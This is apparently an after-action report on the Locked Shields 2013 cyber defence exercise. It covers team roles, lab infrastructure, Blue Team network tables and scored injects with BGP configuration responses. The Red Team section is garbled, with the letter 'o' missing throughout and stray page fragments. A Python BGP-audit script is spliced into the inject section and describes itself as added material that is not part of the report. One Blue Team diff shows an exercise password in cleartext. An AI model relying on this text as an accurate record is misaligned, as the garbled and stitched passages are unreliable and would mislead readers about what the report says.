Secure a virtual IT infrastructure and defend it against the Red Team's attacks.
Maintain the services described in the exercise documentation, assuring the availability, confidentiality and integrity of the systems.
Report detected incidents to the White Team through continuous lightweight reporting and management level SITREPs.
Complete business tasks injected by the White Team.
Respond to information requests and queries from the media.
The majority of Blue Team systems were pre-built by the Green Team. In addition, each Blue Team was allowed to deploy up to 2 virtual machines (VMs) of their own, e.g. for network traffic analysis. Blue Teams were allowed to use their own tools and software provided they did not contravene any licensing terms.
1.2. Number of Teams, Size and Location
Team | Nr of Teams | Team Size | Location
Blue | 10 | 10 plus 1-2 legal advisors | Various, each team has to find the location
The number of Blue Teams was limited to 10 due to technical constraints and the capabilities of the White, Red and Green Teams. The number of members in each Blue Team was limited to 10 persons plus 1-2 legal advisors. Blue Teams had to participate in the Execution of LS13 from their own facilities. Team members were not required to be physically co-located.
1.3. Roles

The following roles were expected to be present in each team:
Team Leader - overall management of the team's activities and POC to the exercise controllers.
Deputy Team Leader - alternative POC for the team.
IT specialists and incident handlers - administrating and securing the systems to defend against the Red Team's attacks; monitoring, detecting and mitigating the attacks.
Reporter - reporting the Blue Team activities to the White Team, which helps the White and other teams to gain situational awareness.
Spokesperson - communicating with inquisitive journalists.
Each Blue Team was asked to accept a legal advisor from their own nation to be engaged with the team.
1.4. Expected Skills
Blue Teams were advised to have specialists with the following skillsets in the team:
System and Network Administration
TCP/IP networking.
Administration of and securing Windows and Linux based systems. Some examples:
Windows domain and Active Directory
Workstations and servers based on different Windows versions
Linux servers running Ubuntu and Debian distributions
Firewalls based on Netfilter, proxy servers
Common network protocols, services and technologies like DNS, NTP, DHCP, HTTP and HTTPS, SMTP, POP3, IMAP, SSH, FTP, RADIUS
VMware vSphere virtualization platform
Administration of network devices (switches running Cisco NX-OS, routers running Cisco IOS and the BGP routing protocol).
Programming skills in a high-level language.
Web application technologies and development
HTML, client-side and server-side scripting such as JavaScript and PHP, SQL databases such as MySQL.
Computer Network Defence
Monitoring, detecting, analysing, reporting and resolving security incidents.
Public Relations
The spokesperson should have participated in media training.

2. Legal Advisors
2.1. Description
Individual legal advisors did not work as a team, but were rather considered members of the respective Blue Teams. Legal advisors were part of the main training audience of LS13. There were three main objectives for engaging legal advisors in the exercise:
1. To educate legal advisors about information technology, with particular attention on the technical execution of cyber operations. The legal advisors were able to follow the technical experts and the actions taking place in the network.
2. To provide opinions and observations on associated legal issues, primarily related to the law of armed conflict, as they derive from the storyline, including legal risk management and operational issues.
3. To create a dialogue and facilitate cooperation between technical experts and legal advisors.
2.2. Number of Teams, Size and Location
One or two legal advisors accompanied each Blue Team. Preferably, the legal advisors were from the same nation or organisation as the majority of the Blue Team members.
2.3. Expected Skills
Legal advisors who are required to deal with cyber-related issues in their official positions were encouraged to participate. They were expected to have at least very basic knowledge about information technology, as otherwise they would have risked finding the information coming from the Blue Team incomprehensible and would not have met the first training objective.

3. Red Team
3.1. Description
The Red Team's mission was to compromise or degrade the performance of the systems protected by the Blue Teams. The Red Team had to accomplish 20 specific objectives and worked closely together with the White Team during the Execution. The focus of the LS exercise was to train the Blue Teams. Therefore Red Team members could be mainly considered as the "work-force" to entertain the Blues. The Red Team used a white-box approach. The technical details about the initial configuration of the Blue Team systems were available to the Red Team beforehand, along with the opportunity to scan Blue Team systems for vulnerabilities and test out the exploits before the Execution. This approach reflected the situation where the attackers have insider information from the target company. It also helped to balance the fact that in a real-world situation, motivated attackers would not have the considerable time constraints that existed during the exercise.
In additin, during the CDX Blue Teams knw that they will be attacked during the shrt timeframe f the game and have cncentrated their defense effrts Number f Teams, Size and Lcatin «Nr f Teams «Team Size «Lcatin «Red 1, many sub-teams 40 Tallinn 3.3. Apprach fr the Red Teaming The main challenge regarding Red teaming within the CDX cntext is t cmpile enugh persnnel t entertain all Blue Teams smewhat equally, yet t be able t handle the

69 4 f 7 cllabratin verhead and handver prcedures. Cllabratin crucial t vercme prblems with fluidity and cntinuity f attack campaigns (e.g. in-depth penetratin and persistence within cmprmised netwrks instead f pprtunistic jabs). T ensure equal distributin f applied skills the Red Team cllabrated as ne. Hwever, it was divided int fllwing sub-teams: Client-side attack team (CS) Web applicatin attack team (WEB) Netwrk layer attack team (NET) 3.4. Expected Skills In general, suitable Red Team candidates are members f penetratin testing teams, Red Teams r similarly riented teams r individuals with relevant teamwrk experience. Red Team members were expected t have recent backgrund in penetratin testing r red teaming. They were als suppsed t be experienced in cnducting such activities as part f the team (cllabratin, handver, infrmatin exchange). Examples f minimum skillsets were: Remte and client-side explitatin Lcal explitatin and privilege escalatin LAN infrastructure explitatin (L2 and L3 attacks) WAN infrastructure attacks (attacks against BGP) Web applicatin pentesting skills (SQL injectin, file inclusin, input validatin bypassing, etc.) Desirable additinal/specialised skills included: Ability t hide and stay resistant in cmprmised hsts and netwrks (backdrs, rtkits, aviding detectin such as lg and timestamp mdificatin). In-depth penetratin skills: taking ver the initial penetratin (shell, backdr, Meterpreter sessin, etc) and expliting further int the netwrk e.g. pass-the-hash, LAN explitatin, malware spreading. Fuzzing - capable f fuzzying prtcls and taking use f fund vulnerabilities during the shrt game executin perid, crashing f services during destructive phases Tls Participants were expected t bring their wn laptps set up with tls f their wn liking as lng as cvered by licensing when using cmmercial tls and as lng as teamwrk (e.g. task handver / wrklad sharing) was feasible. 
Within the virtualized exercise envirnment, Kali Linux was used as ne f the main free attacking platfrms fr Red Teams. Cbalt Strike sftware was used fr teamwrking - the authr, Raphael Mudge, prvided an pprtunity t use his tl free f charge. 0days were permitted and desired but the prbability that smene wuld intrduce explits against unpublished vulnerabilities is very lw in the cntext f an UNCLASS exercise. 4. White Team

4.1. Description

The White Team's (WT) tasks during the preparation period were:
1. Defining the training objectives.
2. Developing the scenario: a background story, roles for the Blue and Red Team, intelligence injects, etc.
3. Defining high-level objectives for the Red Team.
4. Preparing business tasks for the Blue Teams and the inject list.
5. Creating a plan for simulated media.
6. Preparing the communication plan.
7. Defining scoring criteria and the detailed scoring table.
8. Preparing reporting formats and sample reports for SITREPs.
9. Developing the rules. The rules have to cover general aspects such as how the exercise will be run, regulations for Blue Team activities and rules of engagement for the Red Team.

The White Team's main tasks during the Execution were the following:
- Controlling the exercise and the Red Team campaign. The White Team must have close cooperation with the Red Team. The White Team decides when different phases start and stop, and when the Red Team has to wait or slow down its activities.
- Evaluating the progress of the Blue and Red Teams and assigning manual scores. The White Team has to evaluate the reports about successful compromises issued by the Red Team, which result in negative scores. Successful detection of attacks described in incident reports, the ability to respond to business injects, and new creative ideas on how to defend and collaborate with other Blue Teams give positive scores.
- Liaising with the Blue Teams.
- Simulating the activities of the Blue Team organizations' clients. For instance, clients could request new services or complain about the quality of the services.
- Simulating the management and the users of the organizations whose networks the Blue Teams are defending. Firstly, the White Team injects the Blues' different business tasks, such as installing a new application on users' desktops, setting up a new public service or providing the boss remote access to the file server. Secondly, White Team members simulate the actions of ordinary users of the Blue Team organizations by browsing the (game) internet, opening attachments and sending complaints. They also have to do selective checks on Blue Team systems to detect changes in functionality that may not be detected by the automatic scoring system.
- Simulating the Media. For instance, injecting news stories and contacting the Blue Teams as journalists.

4.2. Team Size and Location

Nr of Teams: 1
Team Size: 15
Location: Tallinn

4.3. Roles

During the Execution, there were the following roles and sub-teams inside the White Team:
- Exercise Control
  - Leader and Deputy Leader: running the exercise, deciding when to start certain phases, etc.
  - Schedule Master: keeping the schedule
- Communications and Blue Team liaising team
  - Asking and providing feedback from and to the Blue Teams
  - Simulating the users and clients ("Blondes")
  - Validating the functionality of Blue Team systems
- Red Team liaising: considered mainly as part of the Red Team
- Running the Injects
  - Inject Master: planning scenario injects and coordinating the overall plan for all injects
  - Media Simulation Cell
  - Legal Team: running legal injects
- Scoring
  - Scoring Master: overall responsibility for the scoring
  - Lightweight reports evaluation team: consisted of 3 persons from CERT-EE
  - Evaluating responses to scenario, legal and media injects
  - Making manual scoring decisions

4.4. Expected Skills

In general, White Team members are expected to be experienced security practitioners. They must have good management skills, a sound technical background and the ability to make good decisions fast. However, White Team members can always consult with specialists in the Green Team in case deep technical questions have to be solved.

5. Green Team

5.1. Team Description

The Green Team (GT) was responsible for preparing the technical infrastructure in the lab. GT had to carry out the following tasks:
- Design, set up and configure the core infrastructure: physical devices, virtualization platform, storage, networking, remote access, traffic recording, VPN routers for the Blue Teams, user accounts, etc.
- Design and build the Gamenet and Blue Team networks.
- Program the automatic scoring bot and agents.
- Develop a solution for traffic generation.
- Set up solutions that are required for monitoring the general exercise infrastructure.

5.2. Number of Teams, Size and Location

The Green Team had many members, but only a few of them could contribute full time during the main 4-month preparation period.

Nr of Teams: 1
Team Size: 15
Location: Loughborough, Madrid, Tallinn

5.3. Expected Skills

Naturally, experienced system administrators and software developers were preferred to join the Green Team. Team members had to be capable of building and administering typical components of IT infrastructure:
- Core infrastructure: Cisco UCS platform, VMware vSphere for virtualization, EMC storage devices, network switches, firewalls and VPN gateways.
- Gamenet: Linux and Windows workstations and servers; PHP and Java based web applications; Cisco and Linux routers; programming skills for developing scoring and traffic generation software.

A few Red Team members provided considerable support to the Green Team in preparing the Blue Team systems.

6. Yellow Team

6.1. Description

The Yellow Team's (YT) role was to provide situational awareness about the game situation, mainly to the White Team but also to all other participants. The main sources of data for the Yellow Team were lightweight reports provided by the Blue Teams, reports on the status of the attack campaign received from Red Team members, results of automatic scoring checks, and manual scoring decisions. The Yellow Team analyst had interfaces to review all the reports and assign them tags based on the content of the report. Regular highlight updates were provided to the White Team leader and to the Blue Teams. The Yellow Team also prepared different views and visualizations of the situation.

The Yellow Team developed the technical solution for lightweight reporting as well as wiki-based forms and instructions for the Blue Teams. Two webinars were conducted to explain the reporting and the visualisations in VSRoom.

6.2. Number of Teams, Size and Location

Nr of Teams: 1
Team Size: NA
Location: Helsinki, Tallinn

Contents
1. Cisco UCS Platform
2. Networking Layer
3. Storage
4. Virtualization
5. Remarks

1. Cisco UCS Platform

- Cisco UCS B200 M2 servers: 2 x Intel X5650 processors, 48GB RAM (1.3GHz, 8GB DIMMs), 2-port FCoE 10Gbps. Each Blue Team had their systems running in one of these blades.
- 6x Cisco UCS B200 M3 servers: 2 x Intel E processors, 96GB RAM (1.6GHz, 8GB DIMMs), 2-port FCoE 10Gbps. The cluster of these blades hosted all other systems such as ISP routers, Red Team VMs, traffic recording and collaboration systems, etc.
- 6 x 4-port Cisco fabric extender UCS
- 20-port Fabric Interconnect UCS

2. Networking Layer

- Cisco Catalyst 2960S-24TS-S
- 2x Cisco ASA 5550 security appliances for routing/firewalling between core infra segments and providing remote VPN access to the participants.

3. Storage

2x EMC VNX5300 storage arrays were used, with the following disks for creating many different storage pools: 28x 600GB 10K SAS, 5x 100GB EFD, 16x 600GB 15K SAS, 15x 1TB NL-SAS, 11x 600GB 10K SAS.

The following storage pools were set up on the first VNX server:
- VMFSes for Blue Teams: 600GB 10K SAS, RAID6, real capacity 9 TB
- VMFSes for Red Team Kalis/BackTracks, exercise support infra, Blue Teams 11-12, ESX boot LUNs: 15x 600GB 15K SAS, RAID5, real capacity 6.4 TB
- System information: 4x 600GB 10K SAS, RAID0
- FAST Cache: 4x 100GB EFD, RAID1
- Hot spares

The following storage pools were set up on the second VNX server:
- Core infra management VMs (DC, MS SQL), Yellow Team Recorder and Collab, Blue Team Nexus 1000v Virtual Supervisor Modules: 10x 600GB 10K SAS, RAID6, real capacity 4TB
- File server with several shares (CIFS, NFS, FTP) to hold scripts, templates, install images, archived VMs, backup data: 10x NL-SAS, RAID5, real capacity 7.3TB

4. Virtualization

VMware vSphere 5.0 Enterprise Plus was the underlying virtualization platform.

5. Remarks

Selecting the unified computing platform for the exercise infrastructure was a good decision. Our main constraint is the number of people who can contribute to the preparations of the CDX, and we believe UCS saved us time in management. Still, this estimation is purely empirical and we do not have concrete measurements.

In contrast to the previous exercises we have conducted, there were no infrastructure breakdowns during the game; only a few teams reported slowness in accessing their systems. Traffic recording using Cisco Nexus 1000v switches and the ERSPAN protocol worked smoothly. The requirement to collect all data centrally and also to provide the Blue Teams an option to sniff the data from all their VLANs was met. As expected, the storage was the most utilized component (often 100% of the capacity). Other core infrastructure components (blades, ASA, switches) were moderately utilized.

Contents
1. Simulated Internet
2. Zones
3. Blue Team Systems

1. Simulated Internet

In general, the Gamenet could be seen as consisting of two main parts:
- Simulated Internet (SINET): routing infrastructure, bad guys and all kinds of support systems.
- Blue Team Systems: identical networks for all Blue Teams.

The network scheme of the SINET was the following:

2. Zones

The following table describes the major network Zones in the LS13 Gamenet.

| Zone Name | Abbreviation | VLAN | IP Range | Description |
|---|---|---|---|---|
| Management | MGMT | 1XX | XX.0/24 | Management interfaces for Blue Team VMs. Private VLAN |
| Management2 | MGMT2 | 100, ... | XX/32, XX/32 | Nexus admin interfaces and Windows host for accessing vCenter server |
| Simulated Internet (GT) | GT_SINET | | /24 | Green Team servers providing services like DNS, NTP, software repositories for updates, news portal news.ex, mail server mail.ex, ... |
| Simulated Internet (RT) | RT_SINET | | /18 | Customer traffic (scoring, White Team members, traffic generation) and systems of malicious parties are located in this Zone |
| Simulated Internet (BT) | BT_SINET | | /24 | Each Blue Team has one VM that they can use to check their services from the SINET |
| Mission Demilitarized Zone | MIL_DMZ | 1XX6 | 10.X.6.0/24 | Public services for mission networks |
| Mission Welfare Area | MIL_WEL | 1XX7 | 10.X.7.0/24 | Welfare area for soldiers to browse the Internet, call home, etc. |
| Mission Internal Workstations | MIL_INT | 1XX3 | 10.X.3.0/24 | UNCLASS workstations mainly for communicating with local authorities in Blea |
| Aid Org DMZ | AID_DMZ | 1XX8 | 10.X.108.0/24 | Public services of the Aid Organizations |
| Aid Org Wifi | AID_WIFI | 1XX9 | 10.X.109.0/24 | Wifi area for volunteers joining to work for the Aid Organizations. BTs do not have access to the machines plugged into this segment |
| Aid Org Internal Workstations | AID_INT | 1XX4 | 10.X.104.0/24 | Workstations for Aid Organization employees |

XX denotes the 2-digit team number (01, 02, ..., 10).

3. Blue Team Systems

Each Blue Team had to manage 2 small networks which, according to the scenario, were located in physically different places. All systems were virtual machines running on the VMware vSphere platform. The networks consisted of typical components one could find in office networks and many web applications with public access.

Each MIL-side router of a Blue Team was connected with the SINET through 2 ISP routers. It also had connections with two "adjacent" Blue Teams. The network interfaces for those links were connected but not configured. During the exercise, the teams had to cooperate with each other in order to set up redundant links. The Blue Team network scheme can be found below:

Descriptions of individual systems are provided in the following table:

| Host | Zone | IP | MGMT_IP | OS | RAM | Description | Patching | Required Services |
|---|---|---|---|---|---|---|---|---|
| btx.ex | BT_SINET | XX | XX.51 | Ubuntu Desktop 12.04 | 512 | Linux workstation for Blue Teams to check their own services | allowed | no scored services |
| chat.aidx.ex | AID_DMZ | 10.X | XX.88 | Ubuntu Server | 512 | Chat server for aid organization running IRC daemon | allowed | IRC (TCP: 6667), IRC SSL (TCP: 6697) |
| counting.aidx.ex | AID_DMZ | 10.X | XX.86 | Ubuntu Server | 512 | Body counting system | allowed | HTTP (TCP: 80) |
| csr.milx.ex | VLAN15XX, VLAN15XX+1, VLAN1XX0, VLAN1XX1, VLAN1XX | X+1.0/24, X.0/24, 10.X.0.2, 10.X.1.2, 10.X | XX.2 | Cisco IOS-XE | 4096 | WAN router for connecting the military unit with the ISPs | allowed | BGP (TCP: 179; for peers), SSH (TCP: 22) |
| db.aidx.ex | AID_DMZ | 10.X | XX.84 | Ubuntu Server | | Database server for a few web applications. NFS server for file shares | allowed | HTTP (TCP: 80), MySQL (TCP: 3306), NFS (all required daemons) |
| dc.int.aidx.ex | AID_INT | 10.X | XX.42 | Windows Server | | Domain controller for int.aidx.ex | allowed | W32Time, DNS, Kerberos, LDAP, RPC, SMB, ... |
| dc.int.milx.ex | MIL_INT | 10.X | XX.32 | Windows Server | | Domain controller for int.milx.ex | allowed | W32Time, DNS, Kerberos, LDAP, RPC, SMB, ... |
| dns.aidx.ex | AID_DMZ | 10.X | XX.82 | Ubuntu Server | 256 | DNS server for Zone aidx.ex | allowed | DNS (TCP: 53), DNS (UDP: 53), SSH (TCP: 22) |
| dns.milx.ex | MIL_DMZ | 10.X | XX.62 | Ubuntu Server | 256 | DNS server for Zone milx.ex | allowed | DNS (TCP: 53), DNS (UDP: 53), SSH (TCP: 22) |
| files.int.aidx.ex | AID_INT | 10.X | XX.43 | Windows Server 2003 R2 32bit | 2048 | Internal fileserver for aid organization employees | allowed | SMB (TCP: 445) |
| files.int.milx.ex | MIL_INT | 10.X | XX.33 | Windows | 4096 | Internal fileserver for military unit | allowed | SMB (TCP: 445) |
| fw.aidx.ex | AID_DMZ, AID_INT, AID_WIFI, VLAN1XX2 | 10.X.102.1, 10.X.104.1, 10.X.108.1, 10.X | XX.21 | Linux Endian | | Firewall and VPN gateway for AID organization networks | allowed | DHCP (for AID_WIFI), IPsec VPN, SSH (TCP: 22) |
| fw.milx.ex | MIL_DMZ, MIL_INT, MIL_WEL, VLAN1XX5 | 10.X.3.1, 10.X.5.1, 10.X.6.1, 10.X | XX.31 | Linux Endian | | Firewall and VPN gateway for mission network | allowed | IPsec, SSH (TCP: 22) |
| help.aidx.ex | AID_DMZ | 10.X | XX.87 | Windows Server | | Help request and ticketing system web application | allowed | HTTP (TCP: 80) |
| log.int.milx.ex | MIL_INT | 10.X | XX.35 | Ubuntu | 4096 | Pre-configured log management server | allowed | no scored services |
| mail.aidx.ex | AID_DMZ | 10.X | XX.83 | Ubuntu | 512 | External mail server for aid organization. Also provides access over a web interface. | allowed | HTTP (TCP: 80), HTTPS (TCP: 443), IMAPS (TCP: 993), POP3S (TCP: 995), SMTP (TCP: 25) |
| mail.milx.ex | MIL_DMZ | 10.X | XX.63 | Ubuntu | 256 | External mail server for Military Mission network | allowed | HTTP (TCP: 80), HTTPS (TCP: 443), IMAPS (TCP: 993), POP3S (TCP: 995), SMTP (TCP: 25) |
| mgmt-btx.ex | MGMT | X | NA | Windows Server | | Windows host for Blue Teams to access the vCenter server | allowed | no scored services |
| nexus1000vx | All | NA | XX | Cisco NX-OS | 2048 | Cisco Nexus 1000v switch for the whole Blue Team infrastructure (includes both AID and MIL side) | allowed | no scored services |
| onion.int.milx.ex | MIL_INT | 10.X | XX.36 | Ubuntu (Security Onion) | 4096 | Default installation of Security Onion for network monitoring | allowed | no scored services |
| ownvm-btx.ex | TBD | TBD | XX.TBD | TBD | 4096 | Virtual machine created by the Blue Teams themselves | allowed | no scored services |
| tv.milx.ex | MIL_DMZ | 10.X | XX.65 | Ubuntu | 1024 | TV tower PC on MIL side that allows broadcasting news mainly targeted at the locals in Blea | allowed | FTP (TCP: 21), HTTP (TCP: 80), VLC Streaming (TCP: 8080) |
| ws1.int.aidx.ex | AID_INT | 10.X | XX.141 | Windows XP SP3 | 512 | Windows XP workstation for aid orgs | allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws1.int.milx.ex | MIL_INT | 10.X | XX.131 | Windows XP SP3 | 512 | Windows XP workstation for military units | not allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws1.wel.milx.ex | MIL_WEL | 10.X | XX.171 | Windows | | Windows workstation | allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws2.int.aidx.ex | AID_INT | 10.X | XX.142 | Windows XP SP3 | 512 | Windows XP workstation for aid orgs | allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws2.int.milx.ex | MIL_INT | 10.X | XX.132 | Windows XP SP3 | 512 | Windows XP workstation for military units | not allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws2.wel.milx.ex | MIL_WEL | 10.X | XX.172 | Windows | | Windows workstation | allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws3.int.aidx.ex | AID_INT | 10.X | XX.143 | Windows 7 | | Windows 7 workstation for aid orgs | allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws3.int.milx.ex | MIL_INT | 10.X | XX.133 | Windows 7 | | Windows 7 workstation for military units | not allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws4.int.aidx.ex | AID_INT | 10.X | XX.144 | Windows 7 | | Windows 7 workstation for aid orgs | allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws4.int.milx.ex | MIL_INT | 10.X | XX.134 | Windows 7 | | Windows 7 workstation for military units | not allowed | CIFS (TCP: 445), RDP (TCP: 3389) |
| ws5.int.aidx.ex | AID_INT | 10.X | XX.145 | Ubuntu | 512 | Linux workstation for power users in aid orgs | allowed | SSH (TCP: 22), VNC (TCP: 5901) |
| ws5.int.milx.ex | MIL_INT | 10.X | XX.135 | Ubuntu | 512 | Linux workstation for power users in military units | not allowed | SSH (TCP: 22), VNC (TCP: 5901) |
| | AID_DMZ | 10.X | XX.85 | Ubuntu Server | | Public web server for aid organizations | allowed | FTP (TCP: 21), HTTP (TCP: 80), HTTPS (TCP: 443) |
| | MIL_DMZ | 10.X | XX.64 | Ubuntu Server 10.04 | 512 | PR website for the military mission | not allowed | FTP (TCP: 21), HTTP (TCP: 80), HTTPS (TCP: 443) |

Contents
1. Introduction
2. Redundant Infrastructure
   1. Description
   2. Scoring
   3. Response from BT8
   4. Response from BT6
3. Adversary Assessment I
   1. Description
   2. Response from BT8
   3. Response from BT7
4. Adversary Assessment II
   1. Description
   2. Response from BT8
   3. Response from BT5
5. Abuse Report
   1. Description
   2. Response from BT4
   3. Response from BT8
   4. Response from BT7

1. Introduction

In this Annex we provide more detailed information on the so-called scenario injects that were scored. For each inject, the responses from the two or three Blue Teams who were assigned the highest number of points have been included.

2. Redundant Infrastructure

2.1. Description

Inject Text: Internet infrastructure in Blea is not reliable. Therefore, the more redundancy you have in connecting your networks with the outer world, the better. The main router of your MIL infrastructure, csr.milx.ex, has physical connectivity with two other Blue Teams: Blue(((X+8) mod 10)+1) and Blue((X mod 10)+1). However, the link is down by default and has not been configured. Your task is to agree with your neighbouring Blue Teams to provide each other transit in case the links with the primary ISPs go down, and to configure the routers respectively. You have 1 hour to complete the task and report back via e-mail.

Injection time: Beginning of phase Z Z Day 1
Injection method: e-mail from [email protected]
Inject feedback: e-mail to [email protected] with the correct additional conf entries.
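The inject above asks each team to bring up BGP transit with its two neighbouring Blue Teams; whether such a peering carries the hygiene items a scorer looks for (neighbour password, ttl-security, maximum-prefix, an inbound prefix-list or route-map, encrypted stored passwords) can be checked mechanically. The audit script below is an added example and not part of the report or of any Blue Team's submission; the IOS-style configuration it parses is constructed, with documentation-range addresses and private AS numbers.

```python
"""Audit an IOS-style BGP configuration for peering hygiene.

Added example for the redundant-infrastructure inject; not part of the report
or of any Blue Team's submission. The configuration below is constructed:
192.0.2.0/24 and 198.51.100.0/24 are documentation ranges and the AS numbers
are private. The checks mirror the best-practice items the Green Team scored
(ttl-security, maximum-prefix, peer password, password encryption, inbound
prefix-list/route-map).
"""
from collections import defaultdict

# Constructed sample: a hardened "uplink" peer-group for the ISPs and a new
# "peer" group for the two neighbouring Blue Team links, only one of which
# sets a session password.
SAMPLE_CONFIG = """\
service password-encryption
!
router bgp 65008
 bgp log-neighbor-changes
 neighbor uplink peer-group
 neighbor uplink password 7 0822455D0A16
 neighbor uplink ttl-security hops 1
 neighbor uplink maximum-prefix 200 restart 2
 neighbor uplink prefix-list uplink-in in
 neighbor peer peer-group
 neighbor peer prefix-list uplink-in in
 neighbor peer maximum-prefix 200
 neighbor 192.0.2.1 remote-as 65101
 neighbor 192.0.2.1 peer-group uplink
 neighbor 192.0.2.1 description ISP1
 neighbor 198.51.100.7 remote-as 65007
 neighbor 198.51.100.7 peer-group peer
 neighbor 198.51.100.7 description BT7
 neighbor 198.51.100.9 remote-as 65009
 neighbor 198.51.100.9 peer-group peer
 neighbor 198.51.100.9 description BT9
 neighbor 198.51.100.9 password 7 104D000A0618
!
"""


def parse_bgp(config):
    """Return {name: {attribute: [values]}} for every 'neighbor' line inside
    the 'router bgp' block. 'name' is a neighbour address or a peer-group
    name; a bare 'neighbor X peer-group' line marks X as a group definition."""
    entries = defaultdict(lambda: defaultdict(list))
    in_bgp = False
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("router bgp"):
            in_bgp = True
            continue
        if in_bgp and not raw.startswith(" "):   # left the indented block
            in_bgp = False
        if not in_bgp or not line.startswith("neighbor "):
            continue
        parts = line.split(maxsplit=3)           # neighbor <name> <attr> [value]
        name, attr = parts[1], parts[2]
        value = parts[3] if len(parts) > 3 else ""
        if attr == "peer-group" and value == "":
            entries[name]["is-group"].append("yes")
        else:
            entries[name][attr].append(value)
    return {k: dict(v) for k, v in entries.items()}


def effective(entries, name):
    """Merge a neighbour's own settings over those inherited from its peer-group."""
    own = entries.get(name, {})
    group = own.get("peer-group", [""])[0]
    merged = {k: list(v) for k, v in entries.get(group, {}).items()}
    merged.update(own)
    return merged


def audit(config):
    """Return {neighbour: [missing hygiene items]} for every real neighbour.

    Items: 'password', 'ttl-security', 'maximum-prefix', 'inbound-filter' and
    'password-encryption' (a cleartext password while the device does not
    encrypt stored passwords).
    """
    entries = parse_bgp(config)
    findings = {}
    for name, own in entries.items():
        if "is-group" in own:                    # group definitions are not sessions
            continue
        eff = effective(entries, name)
        missing = [item for item in ("password", "ttl-security", "maximum-prefix")
                   if item not in eff]
        filters = eff.get("prefix-list", []) + eff.get("route-map", [])
        if not any(v.endswith(" in") for v in filters):
            missing.append("inbound-filter")
        pw = eff.get("password", [""])[0]
        # Type-7 passwords are written as "7 <hex>"; anything else is cleartext
        # unless 'service password-encryption' is configured.
        if pw and not pw.startswith("7 ") and "service password-encryption" not in config:
            missing.append("password-encryption")
        findings[name] = missing
    return findings


if __name__ == "__main__":
    for neighbour, missing in audit(SAMPLE_CONFIG).items():
        print(f"{neighbour}: {'OK' if not missing else ', '.join(missing)}")
```

Run against the sample, the ISP session inherits everything from its hardened peer-group, while the BT7 link is flagged for a missing password and ttl-security and the BT9 link for ttl-security alone.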

2.2. Scoring

The scoring criteria were generated "on the fly" by the Green Team members, and therefore the Blue Teams did not know what exactly was evaluated. They could get bonus points for best practice usage:
- Idea correct, BGP configuration OK.
- Configuration complete.
- Bonus points for best practice usage: ttl-sec, max-prefix, peer password, password encryption, ACLs, prefix-lists, peer-group, route-maps, logging tuning, RPF check, local-preference, graceful-restart.

2.3. Response from BT8

Here are relevant conf lines regarding redundant links to partner BTs:

diff --git a/csr.conf b/csr.conf
index edf87cb..ed14c2d
a/csr.conf
,13
interface GigabitEthernet3
negotiation auto
!
interface GigabitEthernet4
- no ip address
- shutdown
+ ip address
ip access-group uplink-in in
negotiation auto
!
interface GigabitEthernet5
- no ip address
- shutdown
+ ip address
ip access-group uplink-in in
negotiation auto
!
interface
-142,6 router bgp
neighbor uplink soft-reconfiguration inbound
neighbor uplink prefix-list uplink-in in
neighbor uplink maximum-prefix
neighbor peer peer-group
+ neighbor peer version 4
+ neighbor peer soft-reconfiguration inbound
+ neighbor peer prefix-list uplink-in in
+ neighbor peer route-map PEER-in in
+ neighbor peer maximum-prefix 200
neighbor remote-as
neighbor peer-group uplink
neighbor description
-150,6 router bgp
neighbor peer-group uplink
neighbor description ISP2
neighbor route-map ISP2-in in
+ neighbor remote-as
neighbor peer-group peer
+ neighbor description BT7
+ neighbor remote-as
neighbor peer-group peer
+ neighbor description BT9
+ neighbor password Vuheeyus2L!
ip access-list logging interval 100
ip access-list log-update threshold
-181,6 ip access-list extended uplink-in
permit tcp host gt 1024 host eq bgp
permit tcp host eq bgp host gt 1024 established
permit tcp host gt 1024 host eq bgp
+ remark --- BGP with neighbors
+ permit tcp host eq bgp host gt 1024 established
+ permit tcp host gt 1024 host eq bgp
+ permit tcp host eq bgp host gt 1024 established
+ permit tcp host gt 1024 host eq bgp
deny tcp any any eq bgp log
remark --- NTP
permit udp host eq ntp host eq
-204,6 ip access-list extended uplink-in
deny ip any host
deny ip any host
deny ip any host
deny ip any host
deny ip any host
remark --- ISP links
deny ip any
deny ip any
,6
ip prefix-list uplink-in seq 30 deny /24 le 32
ip prefix-list uplink-in seq 40 deny /24 le 32
ip prefix-list uplink-in seq 50 permit /0 le 32
!
+route-map PEER-in permit 10
+ set local-preference 90
+ set community 65008:103
+!
route-map ISP1-in permit 10
set local-preference 100
set community 65008:

2.4. Response from BT6

Interface GigabitEthernet3
 ip address
 no ip redirects
 no ip unreachables
 no ip proxy-arp
 negotiation auto
 no mop enabled
!
interface GigabitEthernet4
 ip address
 no ip redirects
 no ip unreachables
 no ip proxy-arp
 negotiation auto
 no mop enabled

 bgp log-neighbor-changes
 bgp graceful-restart restart-time 120
 bgp graceful-restart stalepath-time 360
 bgp graceful-restart
 network mask
 network mask
 network mask
 network mask
 neighbor remote-as
 neighbor remote-as
 neighbor remote-as
 neighbor password C F38167C
 neighbor ttl-security hops 1
 neighbor update-source GigabitEthernet4
 neighbor maximum-prefix restart 2
 neighbor remote-as
 neighbor password C4B F1E52
 neighbor ttl-security hops 1
 neighbor update-source GigabitEthernet5
 neighbor maximum-prefix restart 2

3. Adversary Assessment I

3.1. Description

Inject text: Coalition intelligence asks for a brief assessment of the adversary. Who are they, how many are there, how capable are they, what is their motivation and what are their goals? Provide a reasoned summary of up to 500 words. You have one hour to reply via e-mail. Report to HQ.

Injection time: Two hours into Phase 2, coordinated with Media obj 3.3. Response expected in one hour.
Injection method: e-mail from [email protected].
Inject feedback: e-mail to [email protected]

3.2. Response from BT8

Dear HQ,

Brief summary regarding our adversary:

1) We don't have solid proof regarding the attackers' identity. Due to the limited mandate, we do not have permission to "actively" gather information about attackers (i.e. hack back). Attribution purely based on attackers' IPs and messages left on defaced websites ("hacked by BIT") is not enough to make hard claims regarding their identity. From the commander's briefing, coalition intel report and game documentation it is speculated that the attackers are local Blea extremists who have support from international terrorists.

